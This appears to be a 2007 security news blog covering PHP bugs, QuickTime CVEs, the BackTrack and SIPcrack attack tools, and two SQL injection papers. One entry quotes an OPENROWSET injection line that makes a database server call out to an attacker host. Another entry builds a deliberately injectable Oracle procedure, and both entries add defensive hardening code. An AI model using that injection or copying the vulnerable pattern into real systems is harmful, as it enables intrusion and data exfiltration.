March 7th, 2007
Another day, another PHP bug discovered by the Hardened-PHP team.
- PHP substr_compare() Information Leak Vulnerability: an integer overflow in the substr_compare() function allows reading arbitrary heap memory.
If you enjoyed this post, make sure you subscribe to my RSS feed!
Posted in Month Of PHP Bugs
March 7th, 2007
BackTrack is the top-rated Linux live distribution focused on penetration testing. The long-awaited (~5 months) tool has reached its Version 2.0 final stage. There are a lot of changes since the last version, as mentioned in the Changelog. To name just a few:
- We included a bunch of new drivers in the latest release and were able to bring the desired packet injection functionality to a wider audience.
- By supporting the new ALFA USB hi-power devices there is now a great USB wireless dongle available which allows us to connect an external antenna and use BackTrack to attack even on my Intel MacBook or VMware.
- Even Broadcom 43xx based cards should be able to inject - a bit sloppy but should work.
- The following drivers are now on our CD:
- madwifi-ng (Patched for Injection)
- hostap (Patched for Injection)
- prism54 (Patched for Injection)
- bcm43xx (Patched for Injection)
- rtl8180 (Patched for Injection)
- rtl8187 (Patched for Injection)
- ipw2200 (Patched for Injection)
- rt2570 (ASPj’s Drivers)
- rt2500
- rt61
- rt73
- ipw2100
- ipw3945
- acx100
- zd1211rw
Get yours at http://www.remote-exploit.org
Posted in Penetration Testing, Tools
March 6th, 2007
Today seems to be a bug/vulnerability day. Two more PHP vulnerabilities were exposed in Day 5 of the Month of PHP Bugs project, raising the bug count to 13:
- mod_security rules bypass: a NUL (ASCIIZ terminator) character embedded in application/x-www-form-urlencoded POST data terminates the data in the eyes of mod_security, which gives a trivial way to bypass its rules.
- PHP 4 Ovrimos Extension Multiple Vulnerabilities: the Ovrimos extension shipped with PHP 4 treats its arguments as direct memory pointers. This allows direct memory access, which leads to arbitrary code execution.
Posted in Month Of PHP Bugs
March 6th, 2007
The release of QuickTime 7.1.5 brings excellent news: 7 critical vulnerabilities have been patched. The impact of most of them is described as "may lead to an application crash or arbitrary code execution":
- CVE-ID: CVE-2007-0711 Impact: Viewing a maliciously-crafted 3GP file may lead to an application crash or arbitrary code execution
- CVE-ID: CVE-2007-0712 Impact: Viewing a maliciously-crafted MIDI file may lead to an application crash or arbitrary code execution
- CVE-ID: CVE-2007-0713 Impact: Viewing a maliciously-crafted Quicktime movie file may lead to an application crash or arbitrary code execution
- CVE-ID: CVE-2007-0714 Impact: Viewing a maliciously-crafted Quicktime movie file may lead to an application crash or arbitrary code execution
- CVE-ID: CVE-2007-0715 Impact: Viewing a maliciously-crafted PICT file may lead to an application crash or arbitrary code execution
- CVE-ID: CVE-2007-0716 Impact: Opening a maliciously-crafted QTIF file may lead to an application crash or arbitrary code execution
- CVE-ID: CVE-2007-0717 Impact: Opening a maliciously-crafted QTIF file may lead to an application crash or arbitrary code execution
- CVE-ID: CVE-2007-0718 Impact: Opening a maliciously-crafted QTIF file may lead to an application crash or arbitrary code execution
- CVE-ID: CVE-2006-4965 Impact: Viewing a maliciously-crafted QuickTime movie file or QTL file may lead to arbitrary JavaScript code execution in context of the local domain
Read the release notes
Posted in Mac OS X
March 5th, 2007
Two more PHP vulnerabilities were exposed in Day 4 of the Month of PHP Bugs project, raising the bug count to 11:
- PHP php_binary Session Deserialization Information Leak Vulnerability: malformed session data in php_binary format might leak a portion of heap data into PHP variables.
- PHP WDDX Session Deserialization Information Leak Vulnerability: numerical keys in session data in WDDX format might leak an arbitrary portion of stack data into PHP variables.
Posted in Month Of PHP Bugs
March 5th, 2007
Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences. David Litchfield (NGSSoftware) released this paper, which describes a new method whereby an attacker, seeking to exploit a SQL injection flaw in an Oracle database server, may do so without the need to create an auxiliary inject function in order to execute arbitrary SQL. This is achieved by injecting a pre-compiled cursor into vulnerable PL/SQL objects. The driving force behind this research is to show that all SQL injection flaws can be fully exploited without any system privilege other than CREATE SESSION and accordingly the risk should never be "marked down".
On occasion Oracle in their alerts state that the ability to create a procedure or a function is required for an attacker to be able to exploit a flaw. For example, DB02 in the October 2006 Critical Patch Update was for a vulnerability in the SDO_DROP_USER_BEFORE trigger. In the Risk Matrix section of the alert it states that an attacker must have the CREATE PROCEDURE privilege to exploit the flaw. As we will see this is not the case.
Read Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences
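The defensive side of the paper's argument, as an added Oracle PL/SQL example written for this post rather than taken from Litchfield's paper: a constructed definer's-rights procedure that splices its argument into dynamic SQL (the pattern that makes such objects injectable at all), the same procedure rewritten with a bind variable and invoker's rights, and an audit query that lists definer's-rights PL/SQL units using dynamic SQL so they can be reviewed. The EMP table, the procedure names and the DBMS_ASSERT fallback are assumptions for the example; the dictionary views used by the audit query exist in Oracle 10g and later and need SELECT access to DBA_SOURCE and DBA_PROCEDURES.

```sql
-- Constructed example; not code from the paper or the post.
-- Vulnerable pattern: a definer's-rights procedure (the default) concatenates
-- caller input into dynamic SQL, so anything injected into p_name is parsed and
-- run with the procedure owner's privileges. The paper's point is that exploiting
-- this needs nothing beyond CREATE SESSION.
CREATE OR REPLACE PROCEDURE count_emp_vuln (p_name IN VARCHAR2) AS
  v_sql VARCHAR2(4000);
  v_cnt NUMBER;
BEGIN
  v_sql := 'SELECT COUNT(*) FROM emp WHERE ename = ''' || p_name || '''';
  EXECUTE IMMEDIATE v_sql INTO v_cnt;
  DBMS_OUTPUT.PUT_LINE('rows: ' || v_cnt);
END;
/

-- Hardened version: the input is passed as a bind variable, so it can never
-- become part of the statement text, and AUTHID CURRENT_USER makes the unit
-- run with the caller's privileges instead of the owner's.
CREATE OR REPLACE PROCEDURE count_emp (p_name IN VARCHAR2)
  AUTHID CURRENT_USER
AS
  v_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM emp WHERE ename = :name'
    INTO v_cnt USING p_name;
  DBMS_OUTPUT.PUT_LINE('rows: ' || v_cnt);
END;
/

-- Where a value really must be spliced into the text (an identifier, say),
-- validate it with DBMS_ASSERT rather than trusting it (assumed usage):
--   v_sql := 'SELECT COUNT(*) FROM ' || DBMS_ASSERT.SQL_OBJECT_NAME(p_table);
--   v_sql := '... WHERE ename = ' || DBMS_ASSERT.ENQUOTE_LITERAL(p_name);

-- Audit query: definer's-rights PL/SQL units outside SYS/SYSTEM whose source
-- uses dynamic SQL. These are the candidates to review for concatenated input.
SELECT DISTINCT s.owner, s.name, s.type
FROM   dba_source s
JOIN   dba_procedures p
       ON p.owner = s.owner AND p.object_name = s.name
WHERE  p.authid = 'DEFINER'
AND    (UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%'
        OR UPPER(s.text) LIKE '%DBMS_SQL%')
AND    s.owner NOT IN ('SYS', 'SYSTEM')
ORDER  BY s.owner, s.name;
```

The audit query is deliberately coarse (it matches any mention of EXECUTE IMMEDIATE or DBMS_SQL, including ones that already bind correctly); its purpose is to produce the review list, not a verdict. Packages show up once per public procedure in DBA_PROCEDURES, which is why the DISTINCT is there.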
Posted in Sql Injection, Articles
March 4th, 2007
Short description: SIPcrack is a SIP login sniffer/cracker that contains 2 programs: sipdump to capture the digest authentication and sipcrack to bruteforce the hash using a wordlist or standard input. SIPcrack is able to capture and bruteforce registrar and proxy challenges and should work for all clients/servers.
Links: http://www.codito.de and http://www.remote-exploit.org/codes_sipcrack.html
Posted in Penetration Testing, Voip, Tools
March 4th, 2007
Day 3 of the Month of PHP Bugs project brings one more PHP vulnerability, raising the bug count to 9:
- PHP wddx_deserialize() String Append Buffer Overflow Vulnerability: malformed WDDX data might trigger an exploitable buffer overflow that was introduced by a pseudo security fix.
Posted in Month Of PHP Bugs
March 4th, 2007
Anurag Agarwal released the third article in his series of mini biographies called Reflection, which so far has presented Amit Klein and RSnake; this time the security superstar is Jeremiah Grossman. He is a man of ideas and thinks differently from others, Anurag writes. His blog is amongst the most followed blogs on information security. A must-follow figure in web application security to stay current with emerging threats and news, concludes Anurag.
Jeremiah Grossman is an expert in web application security and is CTO and co-founder of WhiteHat Security. He is also a founding member of the Web Application Security Consortium.
The next Reflection will feature Ivan Ristic, the man behind mod_security. Full article: Reflection on Jeremiah Grossman
Posted in Web Applications, Articles
March 4th, 2007
I just read a great article published by Application Security Inc. which gave me some good ideas for my future SQL injection attacks. It starts like this:
select * from OPENROWSET('SQLoledb', 'uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;', 'select * from table')
Well, having the SQL server call home to your machine is cool enough (bye bye firewall), but the paper's author, Cesar Cerrudo, went a step further. These are the main topics covered by his paper:
- Detection of SQL injection vulnerabilities
- Retrieving results from SQL injection
- Elevating privileges
- Uploading files
- Getting into the internal network
- Port scanning
- Recommendations
I highly recommend Manipulating Microsoft SQL Server Using SQL Injection.
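The OPENROWSET query above only works if the server is allowed to open ad hoc OLE DB connections and the injected statement runs with enough privilege (the example connects as sa). The following T-SQL is an added example written for this post, not code from Cerrudo's paper: it checks both conditions and turns the ad hoc connection facility off. It assumes SQL Server 2005 or later (sys.configurations and the 'Ad Hoc Distributed Queries' option) and a sysadmin connection for the configuration change.

```sql
-- Added example; not from the paper. Assumes SQL Server 2005+.

-- 1. Can this server open ad hoc OLE DB connections such as
--    OPENROWSET('SQLOLEDB', ...) / OPENDATASOURCE? value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name = 'Ad Hoc Distributed Queries';

-- 2. Does the current login hold sysadmin? Run this over the application's
--    connection: an internet-facing app should get 0 here, whereas the
--    query in the post connected as sa.
SELECT SUSER_SNAME()                AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 3. Disable ad hoc distributed queries. It is an advanced option, so it has
--    to be exposed first; needs ALTER SETTINGS (sysadmin/serveradmin).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Verify. With the option off, an OPENROWSET/OPENDATASOURCE call to an
--    ad hoc provider is refused with the "SQL Server blocked access to
--    STATEMENT 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed
--    Queries'" error instead of connecting outbound.
SELECT value_in_use
FROM   sys.configurations
WHERE  name = 'Ad Hoc Distributed Queries';   -- expect 0
```

Disabling the option does not block linked servers configured by an administrator, only ad hoc connection strings supplied inside a query, which is exactly the part an injected statement controls. The privilege check in step 2 matters just as much: with the option off, a sysadmin-level application login still leaves the rest of the paper's topics (privilege elevation, file upload, reaching the internal network) on the table, so the application should connect as a login that owns nothing beyond its own database objects.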
Posted in Sql Injection, Articles